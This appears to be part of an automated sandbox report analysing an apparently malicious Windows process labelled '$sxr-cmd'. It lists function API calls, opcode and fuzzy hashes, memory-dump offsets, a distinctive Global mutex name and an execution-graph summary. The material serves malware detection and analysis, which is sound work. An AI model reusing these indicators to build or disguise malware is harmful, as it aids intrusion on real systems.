                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                      • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction ID: 8aca5d7f2e365e4ffb6e3447257a1ac7fa74675a29182e0eaa1e3f42eaca5367
                                                                                                                      • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction Fuzzy Hash: 0141D93271AB4491EB20CF65E8483AA77B1F798BA4F804121EE4D8B799EB3DC545CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551A0FC
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD46E
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD485
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD4EE
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: iswspace.MSVCRT ref: 00007FF6154FD54D
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD569
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD58C
                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551A1FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                      • String ID: Software\Classes
                                                                                                                      • API String ID: 2714550308-1656466771
                                                                                                                      • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                      • Instruction ID: bb20722f6665759e941928dc67eae8f78d4749de80b7f675861ba86c04b3ecfa
                                                                                                                      • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                      • Instruction Fuzzy Hash: E2419F26A09F5281EA01DB1AD484439A7B4FB85FE0F908131DA5E837B5DF79EC92C380
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleTitle
                                                                                                                      • String ID: -
                                                                                                                      • API String ID: 3358957663-3695764949
                                                                                                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                      • Instruction ID: 4fd8cbf7555cc24e9ffaa6f176f586eccfdfa2e640cee05e9095f2afaf360955
                                                                                                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                      • Instruction Fuzzy Hash: FB317E29A0CB4282EA149B19E814078E7A4AB4AFA4F585136D90E87BF5DF3CEC51C344
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsnicmpswscanf
                                                                                                                      • String ID: :EOF
                                                                                                                      • API String ID: 1534968528-551370653
                                                                                                                      • Opcode ID: 16430380be0fb913083b6884b205c0f5113cd8b1b31c6669d47242da84fc884d
                                                                                                                      • Instruction ID: fb997a48623f523b70301ba470e3b4428a2cf3c9081892f05e2761d9331dff70
                                                                                                                      • Opcode Fuzzy Hash: 16430380be0fb913083b6884b205c0f5113cd8b1b31c6669d47242da84fc884d
                                                                                                                      • Instruction Fuzzy Hash: C8316C39A18E42C6FB649B15A8402B9F6A0EF45F78F445132EA4DC66B1DF2CEC51C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
• Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 0000020D0B622A4D
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: CloseHandleMutexOpen
• String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
• API String ID: 3128266590-3670590667
• Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
• Instruction ID: 77a8a1506dc03aff2eae748c655d70968fab0cec47337070d9b872d8e6813e1e
• Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
• Instruction Fuzzy Hash: 5A21C43660AB4442F770CB96A85871AB3B2F794FA0F854015DE8D4BB56FF39C845C700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: _wcsnicmp
• String ID: /-Y
• API String ID: 1886669725-4274875248
• Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
• Instruction ID: 01de4be1db02d2e144695e587eb8aa0c4138a44e59183a2b243406e9a5acbeec
• Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
• Instruction Fuzzy Hash: 3E21656AE08F9581EA109F1A9544279FAB0BB44FE4F558032DE4D977A4DF3CEC92D700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 0000020D0B622B39
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: CloseHandleMutexOpen
• String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
• API String ID: 3128266590-3670590667
• Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
• Instruction ID: e8b3ca5e35a7bcfd5410c4704d3f1f8157f511ba2f50e19cd11ecf2ac9a6f8e9
• Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
• Instruction Fuzzy Hash: 0621B235609B4041F760DF96B89871A73B2F784F69F844029DE4D4B751FF3AC4468B44
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: Stringtry_get_function
• String ID: LCMapStringEx
• API String ID: 2588686239-3893581201
• Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
• Instruction ID: 035cdf40c030476bd667222e7fb0c170dd444dd583e386f4b7381cea23c94e80
• Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
• Instruction Fuzzy Hash: 0B111A36609BC086E760CB56F48429AB7B5F7C9B90F944126EE8D87B1AEF38C4408B40
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
• Instruction ID: 99289c0748cbae9f70f0cd7b9b24a1584e94155972e2bf547f1a09e4d6d837e1
• Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
• Instruction Fuzzy Hash: 86114C32219B8082EB208F25E44825977B2F7C8FA4F584220DF8D0BBA5EF3AC551CB00
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID:
• String ID: 3$3
• API String ID: 0-2538865259
• Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
• Instruction ID: 042862f4396dbd4be5d8b8a9a6fc21a2cc9c3fc8c1f70d034efa725bd9c2804f
• Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
• Instruction Fuzzy Hash: 5601F779D0ED428AF3948B689884274F760BF55F39F945136C44E825B1EF3C6CA4DB41
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpintry_get_function
• String ID: InitializeCriticalSectionEx
• API String ID: 539475747-3084827643
• Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction ID: 31cc55178c59ce8e9db92d07a94b988a67dbaa0edf0742ff0119a0bc1edd16bb
• Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction Fuzzy Hash: EAF0822570AB9091FB05CBC5F488699A272FB88FB0FC45036E95D0BB56EF3AC485C744
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• API String ID: 738293619-3750699315
• Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction ID: 92cd25a417a1d363d00088463a01956320e32060e21ebf1593024fd58f6e91f9
• Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction Fuzzy Hash: BCE0126120BB4091FA459BD5F9486996273FB88FA0FD89036D91D0F357FE3AC895C704
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006D6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006F0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF61550074D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF615500762
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction ID: 4d9c43b008e2ede26f8f316bc040d7ee20b9546814a3e236215ff3c47c08b911
• Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction Fuzzy Hash: CF416E7AA09A4286EA588F10E44417AF7A0FF89FA4F989435CA4EC3770DF3CE945C740
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction ID: ae37e9e9d1507a28799e7241592aa54756dfccaa33716ddc0c3002db92e6f670
• Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction Fuzzy Hash: 5421532260EF8485EB11CF99E40829AB3B2FB89FA4F954015DE8D5BB25FA79C4428740
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction ID: d6f622aa72fc4c88ab5ab2d18d9ba33d2fad21b8c96f3627565d8bc0fa6d2b0d
• Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction Fuzzy Hash: 44E0ED7161270496F704DFA2D81935976F2FB88F62F89C028C94D0B351EF7E84998754
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:200
                                                                                                                      Total number of Limit Nodes:7
                                                                                                                      execution_graph 15404 242878bb900 15405 242878bb911 _set_errno_from_matherr 15404->15405 15407 242878bb960 15405->15407 15408 242878bb8e0 15405->15408 15411 242878bb444 15408->15411 15410 242878bb8e9 15410->15407 15412 242878bb459 try_get_function 15411->15412 15417 242878bb473 _set_errno_from_matherr 15412->15417 15431 242878bd6a8 15412->15431 15414 242878bb48e 15414->15417 15434 242878bb900 15414->15434 15417->15410 15418 242878bb4bf 15421 242878bd6a8 _set_errno_from_matherr 3 API calls 15418->15421 15419 242878bb4af 15420 242878bd6a8 _set_errno_from_matherr 3 API calls 15419->15420 15422 242878bb4b6 15420->15422 15423 242878bb4c7 15421->15423 15438 242878bb978 15422->15438 15424 242878bb4dd 15423->15424 15425 242878bb4cb 15423->15425 15443 242878bb034 15424->15443 15427 242878bd6a8 _set_errno_from_matherr 3 API calls 15425->15427 15427->15422 15430 242878bb978 __free_lconv_mon 4 API calls 15430->15417 15447 242878bd36c 15431->15447 15433 242878bd6d6 __vcrt_freeptd 15433->15414 15435 242878bb911 _set_errno_from_matherr 15434->15435 15436 242878bb8e0 _set_errno_from_matherr 4 API calls 15435->15436 15437 242878bb4a1 15435->15437 15436->15437 15437->15418 15437->15419 15439 242878bb97d HeapFree 15438->15439 15440 242878bb9af 15438->15440 15439->15440 15441 242878bb998 15439->15441 15440->15417 15442 242878bb8e0 _set_errno_from_matherr 3 API calls 15441->15442 15442->15440 15444 242878bb0e6 _set_errno_from_matherr 15443->15444 15454 242878baf8c 15444->15454 15446 242878bb0fb 15446->15430 15448 242878bd3cd 15447->15448 15451 242878bd3c8 try_get_function 15447->15451 15448->15433 15449 242878bd4b0 15449->15448 15452 242878bd4be GetProcAddress 15449->15452 15450 242878bd3fc LoadLibraryExW 15450->15451 15451->15448 15451->15449 15451->15450 15453 242878bd457 LoadLibraryExW 15451->15453 15452->15448 15453->15451 15455 242878bafa8 15454->15455 15458 
242878bb21c 15455->15458 15457 242878bafbe 15457->15446 15459 242878bb264 Concurrency::details::SchedulerProxy::DeleteThis 15458->15459 15460 242878bb238 Concurrency::details::SchedulerProxy::DeleteThis 15458->15460 15459->15457 15460->15459 15462 242878be784 15460->15462 15463 242878be820 15462->15463 15466 242878be7a7 15462->15466 15464 242878be873 15463->15464 15467 242878bb978 __free_lconv_mon 4 API calls 15463->15467 15528 242878be924 15464->15528 15466->15463 15471 242878be7e6 15466->15471 15473 242878bb978 __free_lconv_mon 4 API calls 15466->15473 15468 242878be844 15467->15468 15470 242878bb978 __free_lconv_mon 4 API calls 15468->15470 15469 242878be808 15472 242878bb978 __free_lconv_mon 4 API calls 15469->15472 15474 242878be858 15470->15474 15471->15469 15476 242878bb978 __free_lconv_mon 4 API calls 15471->15476 15478 242878be814 15472->15478 15479 242878be7da 15473->15479 15475 242878bb978 __free_lconv_mon 4 API calls 15474->15475 15480 242878be867 15475->15480 15481 242878be7fc 15476->15481 15477 242878be8de 15482 242878bb978 __free_lconv_mon 4 API calls 15478->15482 15488 242878c0f38 15479->15488 15485 242878bb978 __free_lconv_mon 4 API calls 15480->15485 15516 242878c1044 15481->15516 15482->15463 15483 242878bb978 HeapFree LoadLibraryExW LoadLibraryExW GetProcAddress __free_lconv_mon 15487 242878be87f 15483->15487 15485->15464 15487->15477 15487->15483 15489 242878c0f41 15488->15489 15514 242878c103c 15488->15514 15490 242878c0f5b 15489->15490 15491 242878bb978 __free_lconv_mon 4 API calls 15489->15491 15492 242878c0f6d 15490->15492 15493 242878bb978 __free_lconv_mon 4 API calls 15490->15493 15491->15490 15494 242878c0f7f 15492->15494 15495 242878bb978 __free_lconv_mon 4 API calls 15492->15495 15493->15492 15496 242878c0f91 15494->15496 15497 242878bb978 __free_lconv_mon 4 API calls 15494->15497 15495->15494 15498 242878c0fa3 15496->15498 15499 242878bb978 __free_lconv_mon 4 API calls 15496->15499 15497->15496 15500 242878c0fb5 15498->15500 15502 
242878bb978 __free_lconv_mon 4 API calls 15498->15502 15499->15498 15501 242878c0fc7 15500->15501 15503 242878bb978 __free_lconv_mon 4 API calls 15500->15503 15504 242878c0fd9 15501->15504 15505 242878bb978 __free_lconv_mon 4 API calls 15501->15505 15502->15500 15503->15501 15506 242878bb978 __free_lconv_mon 4 API calls 15504->15506 15508 242878c0feb 15504->15508 15505->15504 15506->15508 15507 242878c0ffd 15510 242878c1012 15507->15510 15512 242878bb978 __free_lconv_mon 4 API calls 15507->15512 15508->15507 15509 242878bb978 __free_lconv_mon 4 API calls 15508->15509 15509->15507 15511 242878c1027 15510->15511 15513 242878bb978 __free_lconv_mon 4 API calls 15510->15513 15511->15514 15515 242878bb978 __free_lconv_mon 4 API calls 15511->15515 15512->15510 15513->15511 15514->15471 15515->15514 15517 242878c1049 15516->15517 15526 242878c10aa 15516->15526 15518 242878c1062 15517->15518 15519 242878bb978 __free_lconv_mon 4 API calls 15517->15519 15520 242878bb978 __free_lconv_mon 4 API calls 15518->15520 15521 242878c1074 15518->15521 15519->15518 15520->15521 15522 242878c1086 15521->15522 15523 242878bb978 __free_lconv_mon 4 API calls 15521->15523 15524 242878c1098 15522->15524 15525 242878bb978 __free_lconv_mon 4 API calls 15522->15525 15523->15522 15524->15526 15527 242878bb978 __free_lconv_mon 4 API calls 15524->15527 15525->15524 15526->15469 15527->15526 15529 242878be954 15528->15529 15530 242878be929 15528->15530 15529->15487 15530->15529 15534 242878c1108 15530->15534 15533 242878bb978 __free_lconv_mon 4 API calls 15533->15529 15535 242878be94c 15534->15535 15536 242878c1111 15534->15536 15535->15533 15570 242878c10b0 15536->15570 15539 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15540 242878c113a 15539->15540 15541 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15540->15541 15542 242878c1148 15541->15542 15543 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15542->15543 15544 
242878c1156 15543->15544 15545 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15544->15545 15546 242878c1165 15545->15546 15547 242878bb978 __free_lconv_mon 4 API calls 15546->15547 15548 242878c1171 15547->15548 15549 242878bb978 __free_lconv_mon 4 API calls 15548->15549 15550 242878c117d 15549->15550 15551 242878bb978 __free_lconv_mon 4 API calls 15550->15551 15552 242878c1189 15551->15552 15553 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15552->15553 15554 242878c1197 15553->15554 15555 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15554->15555 15556 242878c11a5 15555->15556 15557 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15556->15557 15558 242878c11b3 15557->15558 15559 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15558->15559 15560 242878c11c1 15559->15560 15561 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15560->15561 15562 242878c11d0 15561->15562 15563 242878bb978 __free_lconv_mon 4 API calls 15562->15563 15564 242878c11dc 15563->15564 15565 242878bb978 __free_lconv_mon 4 API calls 15564->15565 15566 242878c11e8 15565->15566 15567 242878bb978 __free_lconv_mon 4 API calls 15566->15567 15568 242878c11f4 15567->15568 15569 242878bb978 __free_lconv_mon 4 API calls 15568->15569 15569->15535 15571 242878c10f8 15570->15571 15573 242878c10e4 15570->15573 15571->15539 15572 242878bb978 __free_lconv_mon 4 API calls 15572->15573 15573->15571 15573->15572 15574 242878829a0 15575 242878829ce 15574->15575 15576 24287882a2c VirtualAlloc 15575->15576 15577 24287882a50 15575->15577 15576->15577 15578 242878bdb28 15579 242878bdb38 15578->15579 15586 242878bfc4c 15579->15586 15581 242878bdb41 15582 242878bdb4f 15581->15582 15594 242878bd92c GetStartupInfoW 15581->15594 15587 242878bfc6b 15586->15587 15593 242878bfc94 15586->15593 15588 242878bb8e0 _set_errno_from_matherr 4 API calls 15587->15588 15589 
242878bfc70 15588->15589 15605 242878bb7c0 15589->15605 15591 242878bfc7c 15591->15581 15593->15591 15608 242878bfb54 15593->15608 15595 242878bd961 15594->15595 15596 242878bd9fb 15594->15596 15595->15596 15597 242878bfc4c 5 API calls 15595->15597 15600 242878bda1c 15596->15600 15598 242878bd98a 15597->15598 15598->15596 15599 242878bd9b4 GetFileType 15598->15599 15599->15598 15602 242878bda3a 15600->15602 15601 242878bdb0d 15601->15582 15602->15601 15603 242878bda95 GetStdHandle 15602->15603 15603->15602 15604 242878bdaa8 GetFileType 15603->15604 15604->15602 15615 242878bb710 15605->15615 15607 242878bb7d9 15607->15591 15609 242878bb900 _set_errno_from_matherr 4 API calls 15608->15609 15613 242878bfb75 15609->15613 15610 242878bfbd7 15611 242878bb978 __free_lconv_mon 4 API calls 15610->15611 15612 242878bfbe1 15611->15612 15612->15593 15613->15610 15621 242878bd6fc 15613->15621 15616 242878bb444 _set_errno_from_matherr 4 API calls 15615->15616 15617 242878bb735 15616->15617 15618 242878bb746 15617->15618 15619 242878bb710 _invalid_parameter_noinfo 4 API calls 15617->15619 15618->15607 15620 242878bb7d9 15619->15620 15620->15607 15622 242878bd36c try_get_function 3 API calls 15621->15622 15623 242878bd732 15622->15623 15624 242878bd747 InitializeCriticalSectionAndSpinCount 15623->15624 15625 242878bd73c 15623->15625 15624->15625 15625->15613 15626 242878bb978 15627 242878bb97d HeapFree 15626->15627 15628 242878bb9af 15626->15628 15627->15628 15629 242878bb998 15627->15629 15630 242878bb8e0 _set_errno_from_matherr 3 API calls 15629->15630 15630->15628

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
